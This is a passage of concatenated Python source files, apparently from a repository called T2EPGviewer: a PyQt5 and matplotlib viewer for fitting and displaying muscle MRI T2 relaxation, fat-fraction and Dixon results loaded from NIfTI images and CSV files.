1, 1) self.optimizeB1scale = QtWidgets.QCheckBox(self.widget) self.optimizeB1scale.setText("") self.optimizeB1scale.setChecked(True) self.optimizeB1scale.setObjectName("optimizeB1scale") self.gridLayout.addWidget(self.optimizeB1scale, 5, 4, 1, 1) self.optimizeFatFraction = QtWidgets.QCheckBox(self.widget) self.optimizeFatFraction.setText("") self.optimizeFatFraction.setChecked(True) self.optimizeFatFraction.setObjectName("optimizeFatFraction") self.gridLayout.addWidget(self.optimizeFatFraction, 4, 4, 1, 1) self.b1scaleLabel = QtWidgets.QLabel(self.widget) self.b1scaleLabel.setObjectName("b1scaleLabel") self.gridLayout.addWidget(self.b1scaleLabel, 5, 0, 1, 1) self.muscleT1value = QtWidgets.QLineEdit(self.widget) self.muscleT1value.setObjectName("muscleT1value") self.gridLayout.addWidget(self.muscleT1value, 6, 1, 1, 1) self.T2echoValue = QtWidgets.QLineEdit(self.widget) self.T2echoValue.setValidator(QtGui.QDoubleValidator()) self.T2echoValue.setObjectName("T2echoValue") self.gridLayout.addWidget(self.T2echoValue, 8, 1, 1, 1) self.muscleFractionValue = QtWidgets.QLineEdit(self.widget) self.muscleFractionValue.setValidator(QtGui.QDoubleValidator()) self.muscleFractionValue.setObjectName("muscleFractionValue") self.gridLayout.addWidget(self.muscleFractionValue, 3, 1, 1, 1) self.muscleFractionLabel = QtWidgets.QLabel(self.widget) self.muscleFractionLabel.setObjectName("muscleFractionLabel") self.gridLayout.addWidget(self.muscleFractionLabel, 3, 0, 1, 1) self.label = QtWidgets.QLabel(self.widget) self.label.setObjectName("label") self.gridLayout.addWidget(self.label, 8, 0, 1, 1) self.fatT1label = QtWidgets.QLabel(self.widget) self.fatT1label.setObjectName("fatT1label") self.gridLayout.addWidget(self.fatT1label, 7, 0, 1, 1) self.retranslateUi(Dialog) self.buttonBox.accepted.connect(self.dialog_ok_clicked) self.buttonBox.rejected.connect(Dialog.reject) QtCore.QMetaObject.connectSlotsByName(Dialog) def retranslateUi(self, Dialog): _translate = QtCore.QCoreApplication.translate Dialog.setWindowTitle(_translate("Dialog", "EPG")) self.fatT1value.setText(_translate("Dialog", "1450")) self.muscleFractionMax.setText(_translate("Dialog", "10")) self.fatFractionMin.setText(_translate("Dialog", "0")) self.fatFractionMax.setText(_translate("Dialog", "10")) self.b1scaleMax.setText(_translate("Dialog", "2")) self.muscleFractionMin.setText(_translate("Dialog", "0")) self.b1scaleValue.setText(_translate("Dialog", "1")) self.b1scaleMin.setText(_translate("Dialog", "0")) self.fatFractionLabel.setText(_translate("Dialog", "Fat Fraction")) self.fatFractionValue.setText(_translate("Dialog", ".3")) self.muscleT1label.setText(_translate("Dialog", "<html><head/><body><p>Muscle T<span style=\" vertical-align:sub;\">1</span> (ms)</p></body></html>")) self.fatT2min.setText(_translate("Dialog", "0")) self.maxHeadingLabel.setText(_translate("Dialog", "maximum")) self.minHeadingLabel.setText(_translate("Dialog", "minimum")) self.valueHeadingLabel.setText(_translate("Dialog", "value")) self.fatT2value.setText(_translate("Dialog", "200")) self.muscleT2value.setText(_translate("Dialog", "35")) self.fatT2label.setText(_translate("Dialog", "<html><head/><body><p>Fat T<span style=\" vertical-align:sub;\">2</span> (ms)</p></body></html>")) self.fatT2max.setText(_translate("Dialog", "2000")) self.muscleT2max.setText(_translate("Dialog", "150")) self.opimizedHeadingLabel.setText(_translate("Dialog", "optimized")) self.muscleT2label.setText(_translate("Dialog", "<html><head/><body><p>Muscle T<span style=\" vertical-align:sub;\">2</span> (ms)</p></body></html>")) self.muscleT2min.setText(_translate("Dialog", "0")) self.b1scaleLabel.setText(_translate("Dialog", "B<sub>1</sub> scale")) self.muscleT1value.setText(_translate("Dialog", "500")) self.T2echoValue.setText(_translate("Dialog", "10")) self.muscleFractionValue.setText(_translate("Dialog", "0.7")) self.muscleFractionLabel.setText(_translate("Dialog", "Muscle Fraction")) self.label.setText(_translate("Dialog", "<html><head/><body><p>T<span style=\" vertical-align:sub;\">2</span> Echo (ms)</p></body></html>")) self.fatT1label.setText(_translate("Dialog", "<html><head/><body><p>Fat T<span style=\" vertical-align:sub;\">1</span> (ms)</p></body></html>")) def dialog_ok_clicked(self): print("dialog_ok_clicked") self.Dialog.setResult(1) worked =self.get_fitparameters() if worked: self.params.pretty_print() self.Dialog.accept() def get_fitparameters( self ): print("self.optimizeFatFraction.isChecked()", self.optimizeFatFraction.isChecked() ) #epgt2fitparams = lm.Parameters() worked = True try: self.params.add(name='T2muscle', value = float(self.muscleT2value.text()), min = float(self.muscleT2min.text()), max = float(self.muscleT2max.text()), vary = self.optimizeMuscleT2.isChecked()) self.params.add(name='T2fat', value = float(self.fatT2value.text()), min = float(self.fatT2min.text()), max = float(self.fatT2max.text()), vary = self.optimizeFatT2.isChecked()) self.params.add(name='Amuscle', value = float(self.muscleFractionValue.text()), min = float(self.muscleFractionMin.text()), max = float(self.muscleFractionMax.text()), vary = self.optimizeMuscleFraction.isChecked()) self.params.add(name='Afat', value = float(self.fatFractionValue.text()), min = float(self.fatFractionMin.text()), max = float(self.fatFractionMax.text()), vary = self.optimizeFatFraction.isChecked()) self.params.add(name='B1scale', value = float(self.b1scaleValue.text()), min = float(self.b1scaleMin.text()), max = float(self.b1scaleMax.text()), vary = self.optimizeB1scale.isChecked()) self.params.add(name='T1muscle', value = float(self.muscleT1value.text()), vary = False) self.params.add(name='T1fat', value = float(self.fatT1value.text()), vary = False) self.params.add(name='echo', value = float(self.T2echoValue.text()), vary = False) buttonsChecked = [not self.optimizeFatFraction.isChecked(), not self.optimizeMuscleFraction.isChecked(), not self.optimizeMuscleT2.isChecked(), not self.optimizeFatT2.isChecked(), not self.optimizeB1scale.isChecked()] print(buttonsChecked) if all(buttonsChecked): worked=False self.lmparams['epgt2fitparams'] = self.params except: worked = False return worked if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Dialog = QtWidgets.QDialog() Dialog.setModal(False) lmparams = {} epgt2fitparams = lm.Parameters() epgt2fitparams.add('T2fat', value = 180.0, min=0, max=5000, vary=False) epgt2fitparams.add('T2muscle', value = 35, min=0, max=100, vary=True ) epgt2fitparams.add('Afat', value = 0.01, min=0, max=10, vary=True ) epgt2fitparams.add('Amuscle', value = 0.1, min=0, max=10, vary=True ) epgt2fitparams.add('T1fat', value = 365.0, vary=False) epgt2fitparams.add('T1muscle', value = 1400, vary=False) epgt2fitparams.add('echo', value = 10.0, vary=False) epgt2fitparams.add('B1scale', value = 1.0, min=0, max=2, vary=True) lmparams['epgt2fitparams']=epgt2fitparams ui = EpgT2paramsDialog(lmparams) ui.setupEpgT2paramsDialog(Dialog) rt=Dialog.open() print("Dialog.result() =",Dialog.result()) #print( "get_fitparameters(ui).items()", ui.get_fitparameters().items()) sys.exit(app.exec_())
Python
346
47.427746
158
/epgT2paramsDialog.py
0.631373
0.606525
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Wed Apr 17 14:34:43 2019 @author: neh69 """ import numpy as np import matplotlib from matplotlib import pyplot as plt #import seaborn as sns from matplotlib.backends.qt_compat import QtCore, QtWidgets, is_pyqt5 #import seaborn as sns if is_pyqt5(): print("pyqt5") from matplotlib.backends.backend_qt5agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) else: print("pyqt4") from matplotlib.backends.backend_qt4agg import ( FigureCanvas, NavigationToolbar2QT as NavigationToolbar) #from matplotlib.figure import Figure import mplcursors #from ImageData import T2imageData parameterNames ={'T2m': [ 'T$_{2m}$ [ms]','{}, T$_{{2m}}$ = {:.1f} [ms]' ], 'Am100': [ 'A$_{m}$ [%]', '{}, A$_{{m}}$ = {:.1f} [%]' ], 'Af100': [ 'A$_{f}$ [%]', '{}, A$_{{f}}$ = {:.1f} [%]'], 'B1': [ 'B$_{1}$ [-]', '{}, B$_{{1}}$ = {:.1f} [-]'], 'fatPC': [ 'fat [%]', '{}, fat = {:.1f} [%]'] } class MRIPlotWidget(QtWidgets.QWidget): #class PlotWidget(QtWidgets.QWidget): def __init__(self, parent=None, showToolbar=True, imageData=None): super().__init__(parent) self.fig, self.ax = plt.subplots() # fig =Figure(figsize=(3, 5)) self.fig.set_tight_layout(True) self.plot_canvas = FigureCanvas(self.fig) # self.ax = self.fig.add_subplot(111) # mplcursors.cursor(fig,hover=True) self.layout = QtWidgets.QVBoxLayout(self) # def __init__( self, parent=None, showToolbar=True, imageData=None): self.axesList = [] self.imageData = imageData sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) self.toggleImage = QtWidgets.QRadioButton("Hide background Image") self.toggleImage.toggled.connect(lambda: self.toggleImageChanged(self.toggleImage)) self.toggleImage.isChecked() self.layout.addWidget(self.toggleImage) self.toggleImage.setSizePolicy(sizePolicy) self.sliceLabel = QtWidgets.QLabel("slices") self.layout.addWidget(self.sliceLabel) self.sliceLabel.setSizePolicy(sizePolicy) self.slicesSlider = QtWidgets.QSlider(QtCore.Qt.Horizontal) self.slicesSlider.setMinimum(0) self.slicesSlider.setMaximum(4) self.slicesSlider.setValue(0) self.slicesSlider.setTickPosition(QtWidgets.QSlider.TicksBelow) self.slicesSlider.setTickInterval(1) self.slicesSlider.valueChanged.connect(self.valuechangedSlider) self.slicesSlider.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)) self.layout.addWidget(self.slicesSlider) self.echoesLabel = QtWidgets.QLabel("echoes") self.echoesLabel.setSizePolicy(sizePolicy) self.layout.addWidget(self.echoesLabel) self.echoesSlider = QtWidgets.QSlider(QtCore.Qt.Horizontal) self.echoesSlider.setMinimum(0) self.echoesSlider.setMaximum(16) self.echoesSlider.setValue(0) self.echoesSlider.setTickPosition(QtWidgets.QSlider.TicksBelow) self.echoesSlider.setTickInterval(1) self.echoesSlider.valueChanged.connect(self.valuechangedSlider) self.echoesSlider.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)) self.layout.addWidget(self.echoesSlider) self.layout.addWidget(self.plot_canvas) if showToolbar: self.toolbar = NavigationToolbar(self.plot_canvas, self) self.layout.addWidget(self.toolbar) self.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding) self.updateGeometry() self.plot_canvas.mpl_connect('button_press_event', self.onclick) # self.plot_canvas.mpl_connect("motion_notify_event", self.onhover) self.ax.imshow(matplotlib.image.imread('vision.png')[:,:,0]) # self.canvas.figure.axes # self.mpl_cursor = mplcursors.cursor(self.plot_canvas.figure.axes,hover=True) self.ax.grid(False) def valuechangedSlider(self): slice_ = self.slicesSlider.value() echo = self.echoesSlider.value() self.imageData.currentSlice = slice_ self.imageData.currentEcho = echo print("slicesSlider Value =", slice_, "echoesSlider Value =", echo ) if isinstance(self.imageData.ImageDataT2, np.ndarray): print("updating image slice") if self.toggleImage.isChecked(): self.imageData.mriSliceIMG *= 0.0 else: self.imageData.mriSiceIMG=self.imageData.ImageDataT2[:,:,slice_,echo].copy() self.imageData.overlayRoisOnImage(slice_+1, self.imageData.fittingParam) self.update_plot(self.imageData.mriSiceIMG, self.imageData.maskedROIs.reshape(self.imageData.mriSiceIMG.shape)) self.histPlotWidget.update_plot([slice_+1,self.imageData.T2slices,self.imageData.dixonSlices], [self.imageData.t2_data_summary_df,self.imageData.dixon_data_summary_df], self.imageData.fittingParam) self.barPlotWidget.update_plot([slice_+1,self.imageData.T2slices,self.imageData.dixonSlices], [self.imageData.t2_data_summary_df,self.imageData.dixon_data_summary_df], self.imageData.fittingParam) else: print("No images to update") def on_fittingParams_rbtn_toggled(self, fittingParam): # rb = self.fittingParams_rbtn.sender() print(fittingParam) self.imageData.fittingParam = fittingParam self.valuechangedSlider() def register_PlotWidgets(self, T2PlotWidget, histPlotWidget, barPlotWidget, radioButtonsWidget): self.T2PlotWidget = T2PlotWidget self.histPlotWidget = histPlotWidget self.barPlotWidget = barPlotWidget self.radioButtonsWidget = radioButtonsWidget # def onhover(self,event): # # if event.inaxes: # # xcoord = int(round(event.xdata)) # ycoord = int(round(event.ydata)) # # print('on hover, ', xcoord, ycoord) def onclick(self,event): xcoord = int(round(event.xdata)) ycoord = int(round(event.ydata)) print("MRI Plot window On Click") print('ycoord =', ycoord) print(type(self.imageData.ImageDataT2)) if type(self.imageData.ImageDataT2) != type(None): image_shape = self.imageData.ImageDataT2.shape print(image_shape[0],image_shape[0]-ycoord, ycoord) t2data = self.imageData.ImageDataT2[ycoord,xcoord,int(self.slicesSlider.value()),:] self.T2PlotWidget.update_plot( xcoord, ycoord, t2data) def update_plot(self, img, maskedROIs): self.ax.cla() self.ax.imshow(img,cmap=plt.cm.gray, interpolation='nearest') print("maskedROIs.shape", maskedROIs.shape) print("img.shape", img.shape) print("maskedROIs.max()",maskedROIs.max()) if maskedROIs.max() > 0: self.ax.imshow(maskedROIs.reshape(img.shape), cmap=plt.cm.jet, alpha=.5, interpolation='bilinear') mpl_cursor = mplcursors.cursor(self.plot_canvas.figure.axes,hover=True) @mpl_cursor.connect("add") def _(sel): ann = sel.annotation ttt = ann.get_text() xc,yc, zl = [s.split('=') for s in ttt.splitlines()] x = round(float(xc[1])) y = round(float(yc[1])) print("x",x, "y",y) nrows,ncols = img.shape cslice=self.imageData.currentSlice fitParam = self.imageData.fittingParam print("cslice",cslice, "nrows", nrows, "ncols") print("fitParam",fitParam) ### figure out which data set to use slice_df = None if fitParam in self.imageData.t2_data_summary_df.columns: print(fitParam, "T2 dataFrame chosen") data_df = self.imageData.t2_data_summary_df slice_df = data_df[data_df.slice==cslice+1] elif fitParam in self.imageData.dixon_data_summary_df.columns: print(fitParam, "Dixon dataFrame chosen") data_df = self.imageData.dixon_data_summary_df if cslice+1 in self.imageData.T2slices: dixonSliceIndex = self.imageData.dixonSlices[self.imageData.T2slices.index(cslice+1)] slice_df = data_df[data_df.slice==dixonSliceIndex] else: slice_df = data_df[data_df.slice==cslice] ### return current slice # slice_df = data_df[data_df.slice==cslice+1] roiList = [] valueList=[] if not isinstance(slice_df, type(None)): print("type(slice_df)",type(slice_df)) print("slice_df.shape",slice_df.shape) roiList = slice_df[slice_df['pixel_index']==y*ncols+x]['roi'].values valueList = slice_df[slice_df['pixel_index']==y*ncols+x][fitParam].values print("roiList", roiList) print("valueList",valueList) fitParamLabel = parameterNames[fitParam][1] if len(roiList)>0: roi=roiList[0] value=valueList[0] ann.set_text(fitParamLabel.format( roi, value)) else: ann.set_text("x = {:d}\ny = {:d}".format( x, y )) self.ax.grid(False) self.plot_canvas.draw() def toggleImageChanged(self,b1): print("Entered toggleImageChanged") if not isinstance(self.imageData.mriSliceIMG, type(None) ): if self.toggleImage.isChecked(): print("Clear background image") self.update_plot(np.zeros((self.imageData.mriSliceIMG.shape)), self.imageData.maskedROIs.reshape((self.imageData.mriSliceIMG.shape))) else: self.valuechangedSlider()
Python
303
33.709572
124
/mriplotwidget.py
0.581578
0.572616
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Thu Jul 20 10:29:38 2017 @author: neh69 """ import os import sys import numpy as np import pandas as pd import lmfit as lm import matplotlib import matplotlib.pyplot as plt import seaborn as sns from PyQt5 import QtCore, QtWidgets import visionplot_widgets import mriplotwidget from ImageData import T2imageData def openStudyDir(): dlg = QtWidgets.QFileDialog() returned_data = dlg.getExistingDirectory(None, "Study Directory", "") print("openStudyDir\n",returned_data, type(returned_data)) # tree_window.setRootIndex(tree_window.model.index(returned_data)) def openNiftiAnalyzeFile(): dlg = QtWidgets.QFileDialog() returned_data = dlg.getOpenFileName(None, "MRI data nifti/analyze", procDataDirPath, "nii files (*.nii);;analyze files (*.img);;All files (*)") print(returned_data) def getH5file(): dlg = QtWidgets.QFileDialog() returned_data = dlg.getOpenFileName(None, "select results file", procDataDirPath, "CSV files (*.csv);;All files (*)") pathandfilename = returned_data[0] #self.hd5_store = pd.HDFStore(pathandfilename) if len(pathandfilename) > 0: ### attempt to extract details from data print(pathandfilename) imageData.readin_alldata_from_results_filename( os.path.abspath(pathandfilename)) if imageData.read_T2_img_hdr_files(): print("just before read_T2_data()") if imageData.read_T2_data(): imageData.read_Dixon_data() print("just after read_T2_data()") mainWindow.setWindowTitle(imageData.T2resultsFilenameAndPath) #### Update image displayed in window imageData.overlayRoisOnImage(0, imageData.fittingParam) # mri_window.update_plot(imageData.img1) mri_window.update_plot(imageData.mriSliceIMG, imageData.maskedROIs) print("type(imageData.ImageDataT2)",type(imageData.ImageDataT2)) hist_window.update_plot([1,imageData.T2slices,imageData.dixonSlices], [imageData.t2_data_summary_df, imageData.dixon_data_summary_df], "T2m") bar_window.update_plot([1,imageData.T2slices,imageData.dixonSlices], [imageData.t2_data_summary_df, imageData.dixon_data_summary_df], "T2m") #### set min max on sliders mri_window.slicesSlider.setMinimum(0) mri_window.slicesSlider.setMaximum(imageData.numSlicesT2-1) mri_window.slicesSlider.setValue(0) mri_window.echoesSlider.setMinimum(0) mri_window.echoesSlider.setMaximum(imageData.numEchoesT2-1) mri_window.slicesSlider.setValue(0) else: print(imageData.t2_image_hdr_pathfilename, " not found") def fileQuit(self): self.close() def closeEvent(self, ce): self.fileQuit() if __name__ == "__main__": lmparams = {} epgt2fitparams = lm.Parameters() azzt2fitparams = lm.Parameters() epgt2fitparams.add('T2fat', value = 180.0, min=0, max=5000, vary=False) epgt2fitparams.add('T2muscle', value = 35, min=0, max=100, vary=True ) epgt2fitparams.add('Afat', value = 0.20, min=0, max=10, vary=True ) epgt2fitparams.add('Amuscle', value = 0.80, min=0, max=10, vary=True ) epgt2fitparams.add('T1fat', value = 365.0, vary=False) epgt2fitparams.add('T1muscle', value = 1400, vary=False) epgt2fitparams.add('echo', value = 10.0, vary=False) epgt2fitparams.add('B1scale', value = 1.0, min=0, max=2, vary=True ) azzt2fitparams.add_many(('Afat', 60.0, True, 0, 250, None), ('Amuscle', 40.0, True, 0, 250, None), ('T2muscle', 40.0, True, 0, 100, None), ('c_l', 0.55, False, 0, 2000, None), ('c_s', 0.45, False, 0, 2000, None), ('t2_fl', 250.0, False, 0, 2000, None), ('t2_fs', 43.0, False, 0, 2000, None), ('echo', 10.0, False, 0, 2000, None)) lmparams['epgt2fitparams'] = epgt2fitparams lmparams['azzt2fitparams'] = azzt2fitparams params=azzt2fitparams matplotlib.use('Qt5Agg') plt.style.context('seaborn-colorblind') sns.set(font_scale = 0.6) # sns.set_palette("pastel") procDataDirPath = r"/home/eric/Documents/projects/programming/2019/mri_progs/T2EPGviewer/studyData/testStudy/HC-001/sess-1/upperleg/T2/results/muscle/AzzEPG" progname = os.path.basename(sys.argv[0]) qApp = QtWidgets.QApplication(sys.argv) imageData = T2imageData() print("imageData.fittingParam:",imageData.fittingParam) mainWindow = QtWidgets.QMainWindow() mainWindow.setAttribute(QtCore.Qt.WA_DeleteOnClose) mainWindow.setWindowTitle("application main window") file_menu = QtWidgets.QMenu('&File', mainWindow) # file_menu.addAction("&Open study Directory", openStudyDir) file_menu.addAction('&Choose Study Results File', getH5file, QtCore.Qt.CTRL + QtCore.Qt.Key_H) # file_menu.addAction('&Open nifti/analyze image File', openNiftiAnalyzeFile ) # file_menu.addAction('&Choose Rois', imageData.getRoiFiles, QtCore.Qt.CTRL + QtCore.Qt.Key_R) # file_menu.addAction('&Quit', fileQuit, QtCore.Qt.CTRL + QtCore.Qt.Key_Q) mainWindow.menuBar().addMenu(file_menu) main_widget = QtWidgets.QWidget(mainWindow) mainlayout = QtWidgets.QHBoxLayout(main_widget) # mainWindow.setCentralWidget(main_widget) # plot_window1 = mri_widget(main_widget) npts = 256*100 iii = np.random.permutation(np.arange(255*255))[:npts] ddd = np.random.randn(npts)*100+500 data_df = pd.DataFrame({'iii': iii, 'ddd':ddd}) leftwindow = QtWidgets.QWidget() rightwindow = QtWidgets.QWidget() splitHwidget = QtWidgets.QSplitter(QtCore.Qt.Horizontal) hlayout = QtWidgets.QHBoxLayout(leftwindow) vlayout = QtWidgets.QVBoxLayout(rightwindow) mri_window = mriplotwidget.MRIPlotWidget( imageData=imageData) rbtns_window = visionplot_widgets.radiobuttons_fitWidget(mri_window=mri_window) t2plot_window = visionplot_widgets.T2PlotWidget( lmparams, showToolbar=False) bar_window = visionplot_widgets.BarPlotWidget( showToolbar=False, data_df=data_df, image_size=256) hist_window = visionplot_widgets.HistogramPlotWidget( mri_plot=mri_window, showToolbar=True,data_df=data_df, image_size=256) mainlayout.addWidget(splitHwidget) hlayout.addWidget(rbtns_window) hlayout.addWidget(mri_window) vlayout.addWidget(t2plot_window) vlayout.addWidget(bar_window) vlayout.addWidget(hist_window) splitHwidget.addWidget(leftwindow) splitHwidget.addWidget(rightwindow ) mri_window.register_PlotWidgets(t2plot_window, bar_window, hist_window, rbtns_window) main_widget.setFocus() mainWindow.setCentralWidget(main_widget) mainWindow.show() sys.exit(qApp.exec_())
Python
212
32.594341
161
/simple_pandas_plot.py
0.633006
0.603025
EricHughesABC/T2EPGviewer
refs/heads/master
# -*- coding: utf-8 -*- """ Created on Tue Mar 6 14:55:05 2018 @author: ERIC """ import os import numpy as np import pandas as pd import nibabel class T2imageData(): def __init__(self): self.currentSlice = None self.currentEcho = None self.T2imagesDirpath = None self.dixonImagesDirpath = None self.dixonResultsDirpath = None self.T2resultsDirpath = None self.root = None self.studyName = None self.subject = None self.session = None self.imagedRegion = None self.protocol = None self.results = None self.roiType = None self.fitModel = None self.imagedRegionType = self.roiType self.T2imageType = None self.T2MRIimageFilenameAndPath = "" self.dixonImageType = None self.dixonMRIimageFilenameAndPath = "" self.T2resultsFilenameAndPath = "" self.dixonResultsFilenameAndPath = "" self.fittingParam = "T2m" self.numRowsT2 = None self.numColsT2 = None self.numSlicesT2 = None self.numEchoesT2 = None self.dixonSlices = None self.T2slices = None self.ImageDataT2 = None self.mriSliceIMG = None self.t2_data_summary_df = None self.dixon_data_summary_df = None def readin_alldata_from_results_filename(self, fn): print("inside readin_alldata_from_results_filename") self.set_dataDir_and_results_filenames(fn) self.set_T2imageData_filename_and_type() self.set_dixonImageData_filename_and_type() print("T2resultsDirpath :: ",self.T2resultsDirpath) print("dixonResultsDirpath :: ", self.dixonResultsDirpath) print("T2imagesDirpath :: ", self.T2imagesDirpath) print("dixonImagesDirpath :: ", self.dixonImagesDirpath) print("T2imageType :: ", self.T2imageType) print("T2MRIimageFilenameAndPath :: ", self.T2MRIimageFilenameAndPath) print("dixonImageType :: ", self.dixonImageType) print("dixonMRIimageFilenameAndPath ::", self.dixonMRIimageFilenameAndPath) print("T2resultsFilenameAndPath :: ", self.T2resultsFilenameAndPath) print("dixonResultsFilenameAndPath :: ", self.dixonResultsFilenameAndPath) def set_T2imageData_filename_and_type(self): """Searches for image data in directory can be nifti or analyze sets the type and filename""" print("inside set_T2imageData_filename_and_type") print("self.T2imagesDirpath", self.T2imagesDirpath) if self.T2imagesDirpath == None: self.T2imageType = None return False else: imgFilenameList = [ os.path.join(self.T2imagesDirpath,fn) for fn in os.listdir(self.T2imagesDirpath) if "nii" in fn or "img" in fn] if len(imgFilenameList) == 0: self.T2imageType = None self.T2MRIimageFilenameAndPath = None return False else: self.T2MRIimageFilenameAndPath = imgFilenameList[0] if "nii" in self.T2MRIimageFilenameAndPath: self.T2imageType = "nifti" else: self.T2imageType = "analyze" return True def set_dixonImageData_filename_and_type(self): """Searches for image data in directory can be nifti or analyze sets the type and filename filename must have fatPC. in it""" print( "inside set_dixonImageData_filename_and_type") print("self.dixonImagesDirpath",self.dixonImagesDirpath) if self.dixonImagesDirpath == None: self.dionImageType = None return False else: imgFilenameList = [ os.path.join(self.dixonImagesDirpath,fn) for fn in os.listdir(self.dixonImagesDirpath) if "fatPC." in fn and ("nii" in fn or "img" in fn)] if len(imgFilenameList) == 0: self.dixonImageType = None self.dixonMRIimageFilenameAndPath = None return False else: self.dixonMRIimageFilenameAndPath = imgFilenameList[0] if "nii" in self.dixonMRIimageFilenameAndPath: self.dixonImageType = "nifti" else: self.dixonImageType = "analyze" return True def set_results_dir(self,protocol, resultsDir): resultsDirpath = None # resultsDirpath1 = resultsDir dirpath = os.path.join(self.root,self.studyName,self.subject,self.session, self.imagedRegion,protocol, self.results,self.roiType,self.fitModel) if os.path.exists(dirpath): resultsDirpath = dirpath else: dirpath = os.path.join(self.root,self.studyName,self.subject,self.session, self.imagedRegion,protocol, self.results,self.roiType) if os.path.exists(dirpath): fitModels = [f for f in os.listdir(dirpath)] if len(fitModels)> 0: resultsDirpath = os.path.join(dirpath, fitModels[0]) return resultsDir, resultsDirpath def set_dataDir_and_results_filenames( self, fn): print("inside set_dataDir_and_results_filenames") print("fn", fn) resultsDir, resultsFilename = os.path.split(fn) print("resultsDir", resultsDir) print("resultsFilename", resultsFilename) resultsDirList = resultsDir.split(os.path.sep) print("resultsDirList",resultsDirList, ) sessionIndex = [ i for i,w in enumerate(resultsDirList) if "sess" in w] print("sessionIndex",sessionIndex) if len(sessionIndex): si = sessionIndex[0] print("si",si) print("resultsDirList",resultsDirList) print("resultsDirList[0]",resultsDirList[0]) # print("resultsDirList[0][-1]",resultsDirList[0][-1]) if len(resultsDirList[0])>0: if ":" == resultsDirList[0][-1]: # add path seperator if root ends in : resultsDirList[0] = resultsDirList[0]+os.path.sep print("resultsDirList[0]", resultsDirList[0]) self.root = os.path.sep.join(resultsDirList[:si-2]) self.studyName = resultsDirList[si-2] self.subject = resultsDirList[si-1] self.session = resultsDirList[si] self.imagedRegion = resultsDirList[si+1] self.protocol = resultsDirList[si+2] self.results = resultsDirList[si+3] self.roiType = imagedRegionType = resultsDirList[si+4] self.fitModel = resultsDirList[si+5] print("self.root",self.root) ### create directory paths to T2 and Dixon results and image path # T2_images_dirPath # dixon_images_dirPath # dixon_results_dirPath # T2_results_dirPath ## T2 image path dirpath = os.path.join(self.root,self.studyName,self.subject, self.session,self.imagedRegion,"T2") if os.path.exists(dirpath): self.T2imagesDirpath = dirpath ## dixon image path dirpath = os.path.join(self.root,self.studyName,self.subject,self.session, self.imagedRegion,"dixon") if os.path.exists(dirpath): self.dixonImagesDirpath = dirpath ## set T2 and dixon results path if self.protocol.lower() == "t2": self.T2resultsDirpath, self.dixonResultsDirpath, = self.set_results_dir("dixon", resultsDir) elif self.protocol.lower() == "dixon": self.dixonResultsDirpath, self.T2resultsDirpath, = self.set_results_dir("T2", resultsDir) print("self.dixonResultsDirpath", self.dixonResultsDirpath) print("self.T2resultsDirpath", self.T2resultsDirpath) ## set csv results path name for T2 and dixon if "T2".lower() in fn.lower(): self.T2resultsFilenameAndPath = fn resultFilenameList = [ os.path.join(self.dixonResultsDirpath,fi) for fi in os.listdir(self.dixonResultsDirpath) if "results." in fi.lower() and (".csv" in fi.lower() )] if resultFilenameList: self.dixonResultsFilenameAndPath = resultFilenameList[0] elif "dixon" in fn.lower(): self.dixonResultsFilenameAndPath = fn resultFilenameList = [ os.path.join(self.T2resultsDirpath,fi) for fi in os.listdir(self.T2ResultsDirpath) if "results." in fi.lower() and (".csv" in fi.lower() )] if resultFilenameList: self.T2resultsFilenameAndPath = resultFilenameList[0] def read_T2_data(self): print("read_T2_data function entered") print("self.T2resultsFilenameAndPath", self.T2resultsFilenameAndPath) if os.path.exists(self.T2resultsFilenameAndPath): print(self.T2resultsFilenameAndPath, "exists") self.t2_data_summary_df = pd.read_csv(self.T2resultsFilenameAndPath) self.T2slices = list(self.t2_data_summary_df["slice"].unique()) return(True) else: print(self.T2resultsFilenameAndPath, "not Found" ) return(False) def read_Dixon_data(self): print("read_Dixon_data function entered") print("self.dixonResultsFilenameAndPath",self.dixonResultsFilenameAndPath) if os.path.exists(self.dixonResultsFilenameAndPath): print(self.dixonResultsFilenameAndPath, "exists") self.dixon_data_summary_df = pd.read_csv(self.dixonResultsFilenameAndPath) self.dixonSlices = list(self.dixon_data_summary_df["slice"].unique()) return(True) else: print(self.dixonResultsFilenameAndPath, "not Found" ) self.dixon_data_summary_df = pd.DataFrame() return(False) def read_T2_img_hdr_files(self): if os.path.exists(self.T2MRIimageFilenameAndPath): print(self.T2MRIimageFilenameAndPath, " found") self.t2_imghdr = nibabel.load(self.T2MRIimageFilenameAndPath) image_data = self.t2_imghdr.get_data() image_data = np.flipud(image_data.swapaxes(1,0)) self.update_imageDataT2(image_data) [self.numRowsT2, self.numColsT2, self.numSlicesT2, self.numEchoesT2] = self.ImageDataT2.shape # self.img1 = np.zeros((self.numRowsT2, self.numColsT2,3), dtype=np.double) self.mriSliceIMG = np.zeros((self.numRowsT2, self.numColsT2), dtype=np.double) # self.img1[:,:,0] = self.ImageDataT2[:,:,0,0]/(self.ImageDataT2[:,:,0,0].max()*2) # self.img1[:,:,0] = self.ImageDataT2[:,:,0,0] self.mriSliceIMG = self.ImageDataT2[:,:,0,0]*1.0 self.currentEcho = 0 self.currentSlice = 0 # mainWindow.setWindowTitle(self.study_name) return(True) else: return(False) def update_imageDataT2(self, imageData): self.ImageDataT2 = imageData def overlayRoisOnImage(self, slice_pos, roi_data): print("Entering overlayRoisOnImage", slice_pos) print("roi_data",roi_data) if roi_data in self.t2_data_summary_df.columns: roi_image_layer = np.zeros(self.numRowsT2*self.numColsT2) t2_data_query_df = self.t2_data_summary_df.query('slice == {}'.format(str(slice_pos))) roi_image_layer[t2_data_query_df.pixel_index] = t2_data_query_df[roi_data] self.maskedROIs = np.ma.masked_where(roi_image_layer == 0, roi_image_layer) elif roi_data in self.dixon_data_summary_df.columns: # print("slice_pos", slice_pos) # print("self.T2slices.index(slice_pos)",self.T2slices.index(slice_pos)) # print("self.dixonSlices[self.T2slices.index(slice_pos)]",self.dixonSlices[self.T2slices.index(slice_pos)]) 